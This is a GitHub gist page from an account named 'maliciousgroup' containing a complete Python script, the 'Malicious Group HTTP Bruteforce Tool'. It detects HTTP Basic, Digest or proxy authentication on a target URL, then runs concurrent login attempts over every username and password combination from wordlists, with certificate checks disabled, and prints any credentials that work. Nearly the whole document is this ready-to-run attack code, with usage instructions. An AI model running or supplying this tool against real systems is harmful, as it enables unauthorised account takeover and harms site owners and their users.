Skip to content

Instantly share code, notes, and snippets.

@maliciousgroup
Last active August 5, 2020 02:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save maliciousgroup/a48afd18cfe591abdbf2421c14f27658 to your computer and use it in GitHub Desktop.
Save maliciousgroup/a48afd18cfe591abdbf2421c14f27658 to your computer and use it in GitHub Desktop.
Malicious Group HTTP Bruteforce Tool
import itertools
import asyncio
import requests
# noinspection PyUnresolvedReferences
from requests.packages.urllib3.util.retry import Retry
from requests.auth import HTTPBasicAuth, HTTPDigestAuth, HTTPProxyAuth
from requests_toolbelt.auth.http_proxy_digest import HTTPProxyDigestAuth
from requests.adapters import HTTPAdapter
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings()
class HTTPAuthBreaker:
def __init__(self, url: str, user_list: str, pass_list: str, workers: str):
self.url = url
self.user_list = self.__return_list(user_list)
self.pass_list = self.__return_list(pass_list)
self.auth_type = self.__sanity_check(url)
self.workers = int(workers)
if not self.auth_type:
raise KeyboardInterrupt(f"URL {url} failed the sanity check. Are you sure its using HTTP Auth?")
@staticmethod
def __return_list(__item: str) -> list:
stub = []
config = Path(__item)
if config.is_file():
for x in open(__item):
stub.append(x.rstrip())
else:
stub.append(str(__item).rstrip())
return stub
@staticmethod
def __sanity_check(__url):
__auth = False
__codes = [401, 407]
with requests.get(__url) as req:
if req.status_code not in __codes:
return False
if req.status_code == 401 and 'www-authenticate' in req.headers.keys():
if str(req.headers['www-authenticate']).lower().startswith("basic "):
print(f"[!] HTTP Security Authentication identified as HTTP Basic")
__auth = HTTPBasicAuth
elif str(req.headers['www-authenticate']).lower().startswith("digest "):
print(f"[!] HTTP Security Authentication identified as HTTP Digest")
__auth = HTTPDigestAuth
elif req.status_code == 407 and 'proxy-authenticate' in req.headers.keys():
if str(req.headers['proxy-authenticate']).lower().startswith("basic "):
print(f"[!] HTTP Security Authentication identified as Proxy Basic")
__auth = HTTPProxyAuth
elif str(req.headers['proxy-authenticate']).lower().startswith("digest "):
print(f"[!] HTTP Security Authentication identified as Proxy Digest")
__auth = HTTPProxyDigestAuth
return __auth if __auth else False
def __auth_check(self, session: requests.Session, auth: tuple):
with session.get(self.url, auth=self.auth_type(auth[0], auth[1]), verify=False) as res:
if res.status_code == 200:
print(f"\n[!] --> Credentials Found! [{auth[0]} {auth[1]}]\n")
async def main(self):
credentials = []
for u, p in itertools.product(self.user_list, self.pass_list):
credentials.append((u, p))
if len(credentials) < self.workers:
self.workers = len(credentials)
with ThreadPoolExecutor(max_workers=int(self.workers)) as executor:
with requests.Session() as session:
retry = Retry(connect=3, backoff_factor=0.1)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter=adapter)
session.mount('https://', adapter=adapter)
__loop = asyncio.get_event_loop()
tasks = [
__loop.run_in_executor(
executor,
self.__auth_check,
*(session, auth))
for auth in credentials
]
for _ in await asyncio.gather(*tasks):
pass
def usage():
u = f"""
USAGE:
{argv[0]} -h "http://127.0.0.1" -u "admin" -p /tmp/passwords.txt
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt -w 20
OPTIONS:
'-h', '--host' - Set the URL target with Basic Auth login form.
'-u', '--users' - Set the username or path to file containing users.
'-p', '--passwords' - Set the password or path to file containing passwords.
'-w', '--workers' - Set the number of workers to run during attempts.
"""
print(u)
if __name__ == "__main__":
import argparse
from sys import argv
parser = argparse.ArgumentParser(add_help=False, usage=usage)
parser.add_argument('-h', '--host', action='store', dest='host', default='')
parser.add_argument('-u', '--users', action='store', dest='users', default='')
parser.add_argument('-p', '--passwords', action='store', dest='passwords', default='')
parser.add_argument('-w', '--workers', action='store', dest='workers', default='1')
arg = None
try:
arg = parser.parse_args()
except TypeError:
usage()
exit("Invalid options provided. Exiting.")
if not arg.host or not arg.users or not arg.passwords:
usage()
exit("Required options not provided. Exiting.")
loop = asyncio.get_event_loop()
try:
print(f"\n[+] Starting brute-force process...")
print(f"[+] Target: {arg.host}")
print(f"[+] Workers: {arg.workers}")
obj = HTTPAuthBreaker(arg.host, arg.users, arg.passwords, arg.workers)
future = asyncio.ensure_future(obj.main())
loop.run_until_complete(future)
except KeyboardInterrupt as exc:
print(f"[x] Error: {exc}\n")
finally:
loop.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment